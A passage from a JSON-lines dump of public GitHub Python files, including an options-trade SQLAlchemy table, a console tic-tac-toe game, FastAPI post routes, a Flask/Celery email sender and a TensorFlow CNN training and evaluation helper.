\"register_of_calls_and_puts_actions\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.INT, primary_key=True),\n sqlalchemy.Column(\"symbol\", sqlalchemy.String),\n sqlalchemy.Column(\"candle_date\", sqlalchemy.DateTime),\n sqlalchemy.Column(\"open_value\", sqlalchemy.Float),\n sqlalchemy.Column(\"close_value\", sqlalchemy.Float),\n sqlalchemy.Column(\"action_type\", sqlalchemy.String),\n sqlalchemy.Column(\"call_or_put\", sqlalchemy.String),\n sqlalchemy.Column(\"strike\", sqlalchemy.Float),\n sqlalchemy.Column(\"ask_price\", sqlalchemy.Float),\n sqlalchemy.Column(\"bid_price\", sqlalchemy.Float),\n sqlalchemy.Column(\"status_of_action\", sqlalchemy.String),\n sqlalchemy.Column(\"order_date\", sqlalchemy.DateTime),\n)\n\nmetadata.create_all(engine)\n\ndef insert_data(symbol,\n candle_date,\n open_value,\n close_value,\n action_type,\n call_or_put,\n strike,\n ask_price,\n bid_price,\n status_of_action,\n order_date):\n query = register_of_calls_and_puts_actions.insert().values(\n symbol=symbol,\n candle_date=candle_date,\n open_value=open_value,\n close_value=close_value,\n action_type=action_type,\n call_or_put=call_or_put,\n strike=strike,\n ask_price=ask_price,\n bid_price=bid_price,\n status_of_action=status_of_action,\n order_date=order_date)\n database.execute(query)\n\n\ndef ask_purchases(status, symbol, call_or_put):\n list_of_purchases = []\n query = text(\n \"SELECT register_of_calls_and_puts_actions.symbol, \"\n \"register_of_calls_and_puts_actions.action_type, register_of_calls_and_puts_actions.candle_date, \" \n \"register_of_calls_and_puts_actions.strike , register_of_calls_and_puts_actions.ask_price ,\"\n \"register_of_calls_and_puts_actions.bid_price,id \"\n \"FROM register_of_calls_and_puts_actions \"\n \"WHERE register_of_calls_and_puts_actions.status_of_action LIKE :status AND \"\n \"register_of_calls_and_puts_actions.symbol LIKE :symbol AND \"\n \"register_of_calls_and_puts_actions.call_or_put LIKE :call_or_put\"\n )\n\n\n records = database.execute(query, {\"status\": status, \"symbol\": symbol, \"call_or_put\": call_or_put}).fetchall()\n records = list(records)\n print(records)\n for record in records:\n print(record)\n list_of_purchases.append(record)\n\n return list_of_purchases\n\n\nasync def update_status_of_actions(strike, id):\n query = register_of_calls_and_puts_actions.update(). \\\n where(register_of_calls_and_puts_actions.c.id == id).\\\n values(status_of_actions=\"selled\", strike=strike)\n await database.execute(query)\n\n\n\n\nif __name__ == '__main__':\n from datetime import datetime\n insert_data(symbol=\"AAPL\",\n candle_date=\"2021-10-04 09:30:00\",\n open_value=1.1,\n close_value=2.2,\n action_type=\"put condition 1\",\n call_or_put=\"put\",\n strike=3.3,\n ask_price=4.4,\n bid_price=5.5,\n status_of_action=\"on posession\",\n order_date=datetime.now())\n\n ask_purchases(status=\"on posession\", symbol=\"AAPL\", call_or_put=\"call\")\n\n\"\"\"\n\nregister_of_calls_and_puts_actions.c.symbol,\nregister_of_calls_and_puts_actions.c.action_type,\nregister_of_calls_and_puts_actions.c.candle_date,\nregister_of_calls_and_puts_actions.c.strike,\nregister_of_calls_and_puts_actions.c.ask_price,\nregister_of_calls_and_puts_actions.c.bid_price,\nregister_of_calls_and_puts_actions.c.id]\n\"\"\"\n","repo_name":"webclinic017/ameritrade_public","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35300032104","text":"import random\n\n\"\"\"\n\n\"\"\"\n\nclass TicTacToe:\n \n def __init__(self):\n\n #board will be 3x3 matrix\n self.board = [[\" \",\" \",\" \"],[\" \",\" \",\" \"],[\" \",\" \",\" \"]]\n\n #X will start\n self.turn = \"X\"\n\n #server will be X\n self.you = \"X\"\n\n #client will be O\n self.opponenet = \"O\"\n\n #check who is the winner\n self.winner = None\n\n #check if game is over\n self.game_over = False\n\n #check how many moves have been played.\n #if all 9 moves have been played there are no more moves and it's a tie.\n self.counter = 0\n\n self.handle_connection()\n\n #function that handles game play\n def handle_connection(self):\n\n #as long as game is not over a player can make a move\n while not self.game_over:\n\n #if it's your turn you can make a move\n #else, wait for opponnent (computer) to make a move\n if self.turn == self.you:\n move = input(\"Enter a move (row, column):\")\n if self.check_valid_move(move.split(\",\")):\n self.apply_move(move.split(\",\"), self.you)\n self.turn = self.opponenet\n else:\n print(\"Invalid move\")\n else:\n move = [random.randint(0,2), random.randint(0,2)]\n if self.check_valid_move(move):\n self.apply_move(move, self.opponenet)\n self.turn = self.you\n\n #if game is over end the program\n quit()\n\n #execute a player's move\n #note: the move argument is transformed into a list[] via move.split(\",\")\n def apply_move(self, move, player):\n\n if self.game_over:\n return\n \n #increase counter by 1 to track how many moves have been made\n self.counter += 1\n\n #put player's move at indicated spot on board and display board\n self.board[int(move[0])][int(move[1])] = player\n self.print_board()\n\n #check if there's a winner or if it's a tie\n if self.check_if_won():\n if self.winner == self.you:\n print(\"You win\")\n exit()\n elif self.winner == self.opponenet:\n print(\"You lose\")\n exit()\n else:\n if self.counter == 9:\n print(\"It is a tie\")\n exit()\n\n #check if move is valid\n #note: move argument tranformed into list[] via move.split(\",\")\n def check_valid_move(self, move):\n if (move[0] and move[1]) and self.board[int(move[0])][int(move[1])] == \" \":\n return self.board[int(move[0])][int(move[1])] == \" \"\n else:\n self.handle_connection()\n #return self.board[int(move[0])][int(move[1])] == \" \"\n \n \n #check for a winner\n def check_if_won(self):\n\n #check for a winning row\n for row in range(3):\n if self.board[row][0] == self.board[row][1] == self.board[row][2] != \" \":\n self.winner = self.board[row][0]\n self.game_over = True\n return True\n \n #check for a winning column\n for col in range(3):\n if self.board[0][col] == self.board[1][col] == self.board[2][col] != \" \":\n self.winner = self.board[0][col]\n self.game_over = True\n return True\n \n #check for the first diagnal\n if self.board[0][0] == self.board[1][1] == self.board[2][2] != \" \":\n self.winner = self.board[0][0]\n self.game_over = True\n return True\n\n #check for the second diagnal \n if self.board[0][2] == self.board[1][1] == self.board[2][0] != \" \":\n self.winner = self.board[0][2]\n self.game_over = True\n return True\n\n #if no winners, return False \n return False\n \n #display board in the console\n def print_board(self):\n for row in range(3):\n print(\" | \".join(self.board[row]))\n if row != 2:\n print(\"--------------\")\n if row == 2:\n print(\"\\n\\n_____________\\n\\n\")\n\ngame = TicTacToe()\ngame.host_game(\"localhost\", 9999)\n","repo_name":"haileyneorsd/tictactoe_single_python","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16871441868","text":"from typing import List\n\nfrom fastapi import Depends, APIRouter, HTTPException\n\nfrom schemas import Post, PostCreate, PostResponse\nfrom repo.auth_repo import auth_repo\nfrom repo.post_repo import post_repo\n\npost_route = APIRouter()\n\n\n@post_route.get(\"/{post_id}\", response_model=Post, tags=[\"posts\"])\ndef find_by_id(post_id: int):\n result = post_repo.find_by_id(post_id=post_id)\n if result is None:\n raise HTTPException(\n status_code=404,\n detail=f\"POST_NOT_FOUND\",\n\n )\n return result\n\n\n@post_route.get(\"/\", response_model=List[PostResponse], tags=[\"posts\"])\ndef find(limit: int = 10, skip: int = 0):\n return post_repo.find(limit=limit, skip = skip)\n\n\n@post_route.get(\"/{post_id}/comment\", response_model=Post, tags=[\"posts\"])\ndef find_comment(post_id: int):\n return post_repo.find_comment(post_id=post_id)\n\n\n@post_route.post(\"/\", response_model=Post, tags=[\"posts\"])\ndef create(data: PostCreate, user=Depends(auth_repo.validate_token)):\n return post_repo.create(data=data, user_id=user.id)\n\n\n@post_route.patch(\"/{post_id}\", tags=[\"posts\"])\ndef update(post_id: int, data: PostCreate, user=Depends(auth_repo.validate_token)):\n result = post_repo.update(\n data=data, post_id=post_id, user_id=user.id)\n if result is None:\n raise HTTPException(\n status_code=404,\n detail=f\"POST_NOT_FOUND\",\n )\n\n return result\n\n\n@post_route.delete(\"/{post_id}\", tags=[\"posts\"])\ndef delete(post_id: int, user=Depends(auth_repo.validate_token)):\n result = post_repo.delete(post_id=post_id, user_id=user.id)\n if result is None:\n raise HTTPException(\n status_code=404,\n detail=f\"POST_NOT_FOUND\",\n )\n\n return result","repo_name":"prd-tai-nguyen/demo-fastapi","sub_path":"src/controllers/post_controller.py","file_name":"post_controller.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"612414853","text":"from flask import Flask\nfrom flask_mail import Mail, Message\nfrom flask_restful import Api, Resource\nimport config\nfrom tasks import make_celery\n\napp = Flask(__name__)\napi = Api(app)\napp.config['CELERY_BROKER_URL'] = 'amqp://guest:@rabbit:5672//' #here rabbit refers to service in docker-compose file\napp.config['CELERY_RESULT_BACKEND'] = 'db+sqlite:///db.sqlite3'\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USE_SSL'] = True\napp.config['MAIL_USERNAME'] = config.MAIL_USERNAME\napp.config['MAIL_PASSWORD'] = config.MAIL_PASSWORD\n\ncelery = make_celery(app)\nmail = Mail(app)\n\n\nclass MailApi(Resource):\n def get(self):\n send_mail.delay()\n return \"task is assigned!\"\n\n\n@celery.task(name='send_mail')\ndef send_mail():\n msg = Message(\"MAIL API\", sender='', recipients=[''])\n msg.body = \"This is the email body\"\n mail.send(msg)\n return \"Mail Sent!\"\n\n\napi.add_resource(MailApi, '/mailapp')\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"maulikpanchal16/dockerise-celery-rabbitmq-mail_app","sub_path":"mail_app.py","file_name":"mail_app.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28193466365","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport smtplib\nimport socket\nfrom time import time\ndef create_graph_bools(train_batch,layers,test_batch,mode='train',first_run=True,\n\tstddev_n = 0.1, learning_rate = 1e-4,iters=1,min_train_loss=1e-8,\n model_file='test_model',batch_proc=True, \n\twidth=256,height=256,input_mode='CNN',\n\treduce_noise=False,rn_shift=0.15,rn_magnitude=0.8,\n get_deconv=False,deconv_layer='CV2',deconv_val = 'conv',\n auto_test={'bool':False,'test_interval':2,'stop_max':True,'max_iters':10,\n 'fp_inc':2,'fp_inc':2,'train_rate_stop':1e-8,'restore_session':False}):\n if mode == 'train':\n test_batch_bool=False\n only_feed_forward=False\n if first_run == True:\n restore_session = False\n else:\n restore_session = True\n save_model = True\n elif mode == 'test':\n test_batch_bool=True\n only_feed_forward=True\n restore_session = True\n save_model = False\n elif mode == 'evaluate':\n test_batch_bool=False\n only_feed_forward=True\n restore_session = False\n save_model = False\n\n train_stats = []\n test_stats = []\n if auto_test['bool']==False:\n create_graph_return = create_graph(train_batch,layers=layers,test_batch=test_batch,\n width=width,height=height, test_batch_bool=test_batch_bool,only_feed_forward=only_feed_forward,\n restore_session = restore_session, save_model = save_model, stddev_n = stddev_n, \n learning_rate = learning_rate,iters=iters,min_train_loss=min_train_loss,model_file=model_file,input_mode=input_mode,\n reduce_noise=reduce_noise,rn_shift=rn_shift,rn_magnitude=rn_magnitude,\n get_deconv=get_deconv,deconv_layer=deconv_layer,deconv_val = deconv_val)\n else:\n\n learning_rate_down = learning_rate\n print(\"Auto test start\")\n train_interval = auto_test['max_iters']//auto_test['test_interval']\n def auto_test_module(learning_rate_down=learning_rate,fpx_base=0,fnx_base=0,giter=0,restore=False):\n test_layers = []\n for layer in layers:\n test_layers.append(layer.copy())\n train_layers = []\n for layer in layers:\n train_layers.append(layer.copy())\n\n \n test_batch_bool=False\n save_model = True\n only_feed_forward=False\n if restore==False:\n if giter ==0:\n restore_session = False\n else:\n restore_session = True\n else:\n restore_session = True\n iters=auto_test['test_interval']\n create_graph_return = create_graph(train_batch,layers=train_layers,test_batch=test_batch,\n width=width,height=height, test_batch_bool=test_batch_bool,only_feed_forward=only_feed_forward,\n restore_session = restore_session, save_model = save_model, stddev_n = stddev_n, \n learning_rate = learning_rate_down,iters=iters,min_train_loss=min_train_loss,model_file=model_file,input_mode=input_mode,\n reduce_noise=reduce_noise,rn_shift=rn_shift,rn_magnitude=rn_magnitude,\n get_deconv=get_deconv,deconv_layer=deconv_layer,deconv_val = deconv_val)\n #{'tp':tpo,'tn':tno,'fp':fpo,'fn':tno,'sensitivity':o_sensitivity,'specificity':o_specificity}\n\n local_test_layers = []\n for layer in test_layers:\n local_test_layers.append(layer.copy())\n test_batch_bool=True\n only_feed_forward=True\n restore_session = True\n save_model = False\n create_graph_return_test = create_graph(train_batch,layers=test_layers,test_batch=test_batch,\n width=width,height=height, test_batch_bool=test_batch_bool,only_feed_forward=only_feed_forward,\n restore_session = restore_session, save_model = save_model, stddev_n = stddev_n, \n learning_rate = learning_rate_down,iters=iters,min_train_loss=min_train_loss,model_file=model_file,input_mode=input_mode,\n reduce_noise=reduce_noise,rn_shift=rn_shift,rn_magnitude=rn_magnitude,\n get_deconv=get_deconv,deconv_layer=deconv_layer,deconv_val = deconv_val)\n fpx_test = create_graph_return_test['stats']['fp']\n fnx_test = create_graph_return_test['stats']['fn']\n if giter==0:\n fpx_base=fpx_test\n fnx_base=fnx_test\n else:\n fpx_diff = fpx_test - fpx_base\n fnx_diff = fnx_test - fnx_base\n print(\"previous fp:\",fpx_base,\"new fp:\",fpx_test)\n print(\"previous fn:\",fnx_base,\"new fn:\",fnx_test)\n if (fpx_diff > auto_test['fp_inc']) or (fnx_diff > auto_test['fn_inc']):\n learning_rate_down = learning_rate_down/10\n print(\"New learning_rate:\",learning_rate_down)\n fpx_base=fpx_test\n fnx_base=fnx_test \n return [learning_rate_down,fpx_base,fnx_base,create_graph_return_test['stats'].copy(),create_graph_return_test['training_message']]\n \n def loop_stat(list_stat,lr):\n st=\"\"\n for stx,lrx in zip(list_stat,lr):\n st+=str(stx)+\" | learning rate: \"+str(lrx)+\"\\n\"\n return st\n \n learning_rate_list=[]\n err_message=\"\"\n giter=0\n fpx_base,fnx_base=0,0\n st = time()\n if auto_test['stop_max']==True:\n for giter in range(giter,train_interval):\n print(\"Global iter:\",giter,\"/\",train_interval)\n print(learning_rate_down,auto_test['train_rate_stop'])\n learning_rate_down,fpx_base,fnx_base,stats,train_msg = auto_test_module(learning_rate_down,fpx_base,fnx_base,giter=giter,restore=auto_test['restore_session'])\n if train_msg=='min_train_loss':\n print(\"End by training loss\")\n err_message=\"End by training loss\"\n break;\n if learning_rate_down < auto_test['train_rate_stop']:\n print(\"End by learning rate\")\n break;\n test_stats.append(stats)\n learning_rate_list.append(learning_rate_down)\n if (stats['tp']==0) and (stats['fp']==0):\n print(\"Error\")\n err_message=\"Loss: nan found\"\n break;\n else:\n while (learning_rate_down>auto_test['train_rate_stop']):\n print(\"Global iter:\",giter)\n print(learning_rate_down,auto_test['train_rate_stop'])\n learning_rate_down,fpx_base,fnx_base,stats,train_msg = auto_test_module(learning_rate_down,fpx_base,fnx_base,giter=giter,restore=auto_test['restore_session'])\n test_stats.append(stats)\n learning_rate_list.append(learning_rate_down)\n giter+=1\n if train_msg=='min_train_loss':\n print(\"End by training loss\")\n err_message=\"End by training loss\"\n break;\n if (stats['tp']==0) and (stats['fp']==0):\n print(\"Error\")\n err_message=\"Loss: nan found\"\n break;\n email_keys = ['send_email_bool','email_origin','email_pass','email_destination']\n time_taken = np.ceil((time() - st)/60)\n if bool(list(filter(lambda x: x in list(auto_test.keys()),email_keys))):\n if auto_test['send_email_bool']==True:\n content=\"stats:\\n \"+loop_stat(test_stats,learning_rate_list)+\" \\n \"+err_message+\"\\n\"\n #send_mail(email_origin,email_destination,email_pass,subject=\"Test report\",content=\"Test\")\n email_org = auto_test['email_origin']\n email_pass = auto_test['email_pass']\n email_dest = auto_test['email_destination']\n email_subj = \"Model \"+model_file+\" evaluation completed: \"\n email_subj += socket.gethostname()+\" Max-iter \"+str(auto_test['stop_max'])\n email_subj += \"iters: \"+str(giter)+ \" Minutes taken: \"+str(time_taken)\n send_mail(email_org,email_dest,email_pass,subject=email_subj,content=content)\n create_graph_return={'stats':10}\n return create_graph_return.copy()\n\n\n\ndef get_previous_features(i_layer):\n convx_dims = i_layer.get_shape().as_list()\n output_features = 1\n for dim in range(1,len(convx_dims)):\n output_features=output_features*convx_dims[dim]\n return output_features\ndef create_conv(iDic,input_layer,iName,prev_dic,stddev_n = 0.1,norm_offset=0,norm_scale=1,norm_epsilon=1e-6):\n W_name = \"W\"+iName\n b_name = \"b\"+iName\n Z_name = \"Z\"+iName\n conv_name = \"conv\"+iName\n relu_name = \"relu\"+iName\n maxpool_name = \"maxpool\"+iName\n keep_prob_name = 'keep_prob'+iName\n dropout_name = 'dropout'+iName\n if prev_dic['type']=='CV':\n iDic['input_depth']=prev_dic['depth']\n elif prev_dic['type']=='input_layer':\n if 'prev_channels' in iDic.keys():\n iDic['input_depth']=iDic['prev_channels']\n else:\n iDic['input_depth']=1\n if iDic['type']=='CV':\n iDic['W'] = tf.Variable(tf.truncated_normal([iDic['filter_w'], iDic['filter_w'], iDic['input_depth'], iDic['depth']], stddev=stddev_n),name=W_name)\n iDic['b'] = tf.Variable(tf.constant(stddev_n, shape=[iDic['depth']]),name=b_name)\n iDic['conv']= tf.nn.conv2d(input_layer, iDic['W'], strides=iDic['filter_stride'], padding='SAME',name=conv_name) + iDic['b']\n if 'norm_bool' in iDic.keys():\n if iDic['norm_bool']==True:\n iDic['mean'], iDic['variance'] = tf.nn.moments(iDic['conv'],[0,1,2])\n iDic['norm'] = tf.nn.batch_normalization(iDic['conv'],iDic['mean'],iDic['variance'],norm_offset,norm_scale,norm_epsilon)\n iDic['relu']= tf.nn.relu(iDic['norm'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['conv'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['conv'],name=relu_name)\n if 'max_pooling' in iDic.keys():\n if iDic['max_pooling']==True:\n iDic['max'] = tf.nn.max_pool(iDic['relu'], ksize=iDic['max_pool_mask'],strides=iDic['max_pool_stride'], padding=iDic['padding'])\n iDic['output_label']='max'\n else:\n iDic['output_label']='relu'\n else:\n iDic['output_label']='relu'\n elif iDic['type']=='CV2FC':\n vc_input_features = get_previous_features(input_layer)\n iDic['input_layer'] = tf.reshape(input_layer, [-1, vc_input_features])\n\n if 'x2_bool' in iDic.keys():\n if iDic['x2_bool'] == True:\n iDic['x2'] = tf.placeholder(tf.float32, shape=[None, iDic['x2_features']])\n input_layer_mod = tf.concat([iDic['input_layer'],iDic['x2']],1)\n else:\n input_layer_mod = iDic['input_layer']\n else:\n input_layer_mod = iDic['input_layer']\n iDic['input_features'] = get_previous_features(input_layer_mod)\n\n iDic['W'] = tf.Variable(tf.truncated_normal([iDic['input_features'], iDic['neurons']], stddev=stddev_n),name=W_name)\n iDic['b'] = tf.Variable(tf.constant(stddev_n, shape=[iDic['neurons']]),name=b_name) \n iDic['Z'] = tf.matmul(input_layer_mod, iDic['W'],name=Z_name) + iDic['b']\n if 'norm_bool' in iDic.keys():\n if iDic['norm_bool']==True:\n iDic['mean'], iDic['variance'] = tf.nn.moments(iDic['Z'],[0])\n iDic['norm'] = tf.nn.batch_normalization(iDic['Z'],iDic['mean'],iDic['variance'],norm_offset,norm_scale,norm_epsilon)\n iDic['relu']= tf.nn.relu(iDic['norm'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['Z'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['Z'],name=relu_name)\n if 'drop_out_bool' in iDic.keys():\n if iDic['drop_out_bool'] == True:\n iDic['keep_prob'] = tf.placeholder(tf.float32,name=keep_prob_name)\n iDic['dropout'] = tf.nn.dropout(iDic['relu'], iDic['keep_prob'],name=dropout_name)\n iDic['output_label']='dropout'\n else:\n iDic['output_label']='relu'\n else:\n iDic['output_label']='relu'\n elif iDic['type']=='FC':\n if 'x2_bool' in iDic.keys():\n if iDic['x2_bool'] == True:\n iDic['x2'] = tf.placeholder(tf.float32, shape=[None, iDic['x2_features']])\n input_layer_mod = tf.concat([input_layer,iDic['x2']],1)\n else:\n input_layer_mod = input_layer\n else:\n input_layer_mod = input_layer\n iDic['input_features'] = get_previous_features(input_layer_mod)\n iDic['W'] = tf.Variable(tf.truncated_normal([iDic['input_features'], iDic['neurons']], stddev=stddev_n),name=W_name)\n iDic['b'] = tf.Variable(tf.constant(stddev_n, shape=[iDic['neurons']]),name=b_name) \n iDic['Z'] = tf.matmul(input_layer_mod, iDic['W'],name=Z_name) + iDic['b']\n if 'norm_bool' in iDic.keys():\n if iDic['norm_bool']==True:\n iDic['mean'], iDic['variance'] = tf.nn.moments(iDic['Z'],[0])\n iDic['norm'] = tf.nn.batch_normalization(iDic['Z'],iDic['mean'],iDic['variance'],norm_offset,norm_scale,norm_epsilon)\n iDic['relu']= tf.nn.relu(iDic['norm'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['Z'],name=relu_name)\n else:\n iDic['relu']= tf.nn.relu(iDic['Z'],name=relu_name)\n if 'drop_out_bool' in iDic.keys():\n if iDic['drop_out_bool'] == True:\n iDic['keep_prob'] = tf.placeholder(tf.float32,name=keep_prob_name)\n iDic['dropout'] = tf.nn.dropout(iDic['relu'], iDic['keep_prob'],name=dropout_name)\n iDic['output_label']='dropout'\n else:\n iDic['output_label']='relu'\n else:\n iDic['output_label']='relu'\ndef balance_positive_negative(iNp,iBatchSize=256,v=False):\n negative_examples = iNp[iNp[:,-1]==0]\n positive_examples = iNp[iNp[:,-1]==1]\n mini_batch_size_half = iBatchSize//2\n negative_examples_m = negative_examples.shape[0]\n positive_examples_m = positive_examples.shape[0]\n positive_batches = positive_examples_m//mini_batch_size_half\n positive_batch_residual = positive_examples_m%mini_batch_size_half\n negative_batches = negative_examples_m//mini_batch_size_half\n negative_batch_residual = negative_examples_m%mini_batch_size_half\n balanced_batches = min(positive_batches,negative_batches)\n\n batch_list = []\n for batch in range(0,balanced_batches):\n start_batch = batch*mini_batch_size_half\n end_batch = (batch+1)*mini_batch_size_half\n _ = np.concatenate((positive_examples[start_batch:end_batch,:],negative_examples[start_batch:end_batch,:]),0)\n xTemp = (_[:,:-1]).astype('float32')\n xTemp=xTemp/255.0\n yTemp = _[:,-1]\n yTemp = np.asarray(pd.get_dummies(yTemp))\n batch_list.append([xTemp,yTemp])\n if v==True:\n print(\"Pos batches\",positive_batches,\"Pos res\",positive_batch_residual)\n print(\"Neg batches\",negative_batches,\"Neg res\",negative_batch_residual)\n print(\"Selected batches number\",balanced_batches)\n print(\"#batches\",len(batch_list))\n return batch_list.copy()\ndef plot_list(iList,figsize=(10,8),title=\"Loss/Eff\",xlabel=\"Iters\",ylabel=\"Loss/Eff\"): \n plt_loss = np.asarray(iList)\n fig = plt.figure(figsize=figsize)\n plt.plot(np.arange(0,plt_loss.size),plt_loss)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.show()\n##############\ndef create_graph(train_batch,layers,test_batch=None,width=256,height=256,\n batch_proc=True, test_batch_bool=False,\n restore_session = False, save_model = False, only_feed_forward=False,\n stddev_n = 0.1, learning_rate = 1e-4,iters=4,min_train_loss=1e-8,\n model_file='CNN_model',\n input_mode='CNN',wf=0.8,ws=0.3,batch_size=8,\n reduce_noise=False,rn_shift=0.15,rn_magnitude=0.8,\n get_deconv=True,deconv_layer='CV2',deconv_val = 'conv'):\n _x_batch = train_batch[0][0]\n _y_batch = train_batch[0][1]\n class_output = _y_batch.shape[1]\n \n tf.reset_default_graph()\n\n x_flat = width * height\n x = tf.placeholder(tf.float32, shape=[None, x_flat])\n y_ = tf.placeholder(tf.float32, shape=[None, class_output])\n\n##################Add Noise\n\n amp = tf.constant(255.0)\n epsilon_e = 1e-4\n Wf = tf.Variable(rn_magnitude)\n Ws = tf.Variable(rn_shift)\n pow_lim = 20.0\n gen_f = pow_lim/amp\n\n##########################\n\n\n\n\n\n input_layer_dic = {'type':'input_layer'}\n if input_mode=='CNN':\n x_image = tf.reshape(x, [-1,width,height,1])\n #input_layer_dic['output_label']='x_image'\n #input_layer_dic['x_image']=x_image\n \n if reduce_noise==True:\n \n f1 = tf.constant([[1.0,0,-1.0],[1.0,0,-1.0],[1.0,0,-1.0]])\n f2 = tf.transpose(f1)\n f3 = tf.constant([[1.0,0,1.0],[0,0,0],[-1.0,0,-1.0]])\n f4 = tf.transpose(f3)\n f1r = tf.reshape(f1,[3,3,1,1])\n f2r = tf.reshape(f2,[3,3,1,1])\n f3r = tf.reshape(f3,[3,3,1,1])\n f4r = tf.reshape(f4,[3,3,1,1])\n cv1 = tf.abs(tf.nn.conv2d(x_image, f1r, strides=[1,1,1,1], padding='SAME'))\n cv2 = tf.abs(tf.nn.conv2d(x_image, f2r, strides=[1,1,1,1], padding='SAME'))\n cv3 = tf.abs(tf.nn.conv2d(x_image, f3r, strides=[1,1,1,1], padding='SAME'))\n cv4 = tf.abs(tf.nn.conv2d(x_image, f4r, strides=[1,1,1,1], padding='SAME'))\n cvM = cv1+cv2+cv3+cv4\n cvMn = cvM/(tf.reduce_max(cvM)-tf.reduce_min(cvM))\n powf = gen_f*Wf*(amp*cvMn-amp*Ws+epsilon_e)\n noise_red = tf.divide(1.0,tf.add(1.0,tf.exp(-powf)))\n input_layer_dic['output_label']='x_image'\n input_layer_dic['x_image']=noise_red\n else:\n input_layer_dic['output_label']='x_image'\n input_layer_dic['x_image']=x_image\n \n elif input_mode=='noise':\n #powf = gen_f*Wf*(amp*x-amp*Ws+epsilon_e)\n #noise_red = tf.divide(1.0,tf.add(1.0,tf.exp(-powf)))\n x_image = tf.reshape(noise_red, [-1,width,height,1])\n input_layer_dic['output_label']='x_image'\n input_layer_dic['x_image']=x_image\n else:\n input_layer_dic['output_label']='x'\n input_layer_dic['x']=x\n\n layers.insert(0,input_layer_dic)\n\n for i in range(1,len(layers)):\n print(\"Creating layer:\",layers[i]['name'])\n create_conv(iDic=layers[i],input_layer=layers[i-1][layers[i-1]['output_label']],iName=layers[i]['name'],prev_dic=layers[i-1])\n\n FCL_input=layers[-1][layers[-1]['output_label']]\n FCL_input_features = get_previous_features(FCL_input)\n W_FCL = tf.Variable(tf.truncated_normal([FCL_input_features, class_output], stddev=stddev_n))\n b_FCL = tf.Variable(tf.constant(stddev_n, shape=[class_output])) \n FCL=tf.matmul(FCL_input, W_FCL) + b_FCL\n y_CNN = tf.nn.softmax(FCL)\n\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_CNN), reduction_indices=[1]))\n\n train_step = tf.train.AdamOptimizer(learning_rate).minimize(cross_entropy)\n yi = tf.argmax(y_,1)\n yp = tf.argmax(y_CNN,1)\n\n tpi = yp*yi\n tp = tf.reduce_sum(tf.cast(tf.greater(tpi,0),tf.int32))\n \n fni = yi-yp\n fn = tf.reduce_sum(tf.cast(tf.greater(fni,0),tf.int32))\n \n sensitivity = tp/(fn+tp)\n \n tni = yi+yp\n tn = tf.reduce_sum(tf.cast(tf.equal(tni,0),tf.int32))\n \n fpi = yp - yi\n fp = tf.reduce_sum(tf.cast(tf.greater(fpi,0),tf.int32))\n \n specificity = tn/(tn+fp)\n accuracy = (tn+tp)/(tn+tp+fn+fp)\n correct_prediction = tf.equal(tf.argmax(y_CNN,1), tf.argmax(y_,1))\n \n acc_no_mean = tf.cast(correct_prediction, tf.float32)\n\n #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n init_op = tf.global_variables_initializer()\n \n \n ###########\n with tf.Session() as s:\n print(\"Starting session\")\n test_keep_prob = 1.0\n s.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n if restore_session==True:\n #tf.reset_default_graph()\n saver.restore(s,tf.train.latest_checkpoint('./'))\n dic_to_feed = {x:_x_batch,y_:_y_batch}\n for _layer in layers:\n if 'drop_out_bool' in _layer.keys():\n if _layer['drop_out_bool'] == True:\n dic_to_feed[_layer['keep_prob']]=test_keep_prob\n if 'x2_bool' in _layer.keys():\n if _layer['x2_bool'] == True:\n dic_to_feed[_layer['x2']]=hist_batch(_x_batch,bins=_layer['x2_features'])\n for _ in range(1,len(layers)):\n _layer = layers[_]\n _name = _layer['name']\n _label = _layer['output_label']\n _data_show = _layer[_label]\n\n r=s.run(_data_show,feed_dict=dic_to_feed)\n print(_name,_label,r.shape)\n _,cross,acc=s.run([train_step,cross_entropy,accuracy],feed_dict=dic_to_feed)\n print(\"First batch evaluation using the training set, batch 0 \",\"Loss:\",cross,\"Accuracy:\",acc)\n\n return_dic = {'training_message':None}\n if only_feed_forward == False:\n train_total_acc = []\n train_total_cross = []\n dic_to_feed = {x:_x_batch,y_:_y_batch}#,_layer['keep_prob']:1}\n for _layer in layers:\n if 'drop_out_bool' in _layer.keys():\n if _layer['drop_out_bool'] == True:\n dic_to_feed[_layer['keep_prob']]=_layer['keep_prob_train']\n #dic_to_feed[_layer['keep_prob']]=1.0\n if 'x2_bool' in _layer.keys():\n if _layer['x2_bool'] == True:\n dic_to_feed[_layer['x2']]=hist_batch(_x_batch,bins=_layer['x2_features'])\n for itern in range(0,iters):\n if batch_proc == False:\n #dic_to_feed = {x:_x_batch,y_:_y_batch,_layer['keep_prob']:_layer['keep_prob_train']}\n _,cross,acc=s.run([train_step,cross_entropy,accuracy],feed_dict=dic_to_feed)\n print(\"iter:\",itern,\"Loss:\",cross,\"Accuracy:\",acc)\n else:\n train_batch_acc = []\n train_batch_cross = []\n for bn,batch_n in enumerate(train_batch):\n x_batch,y_batch=batch_n[0],batch_n[1]\n 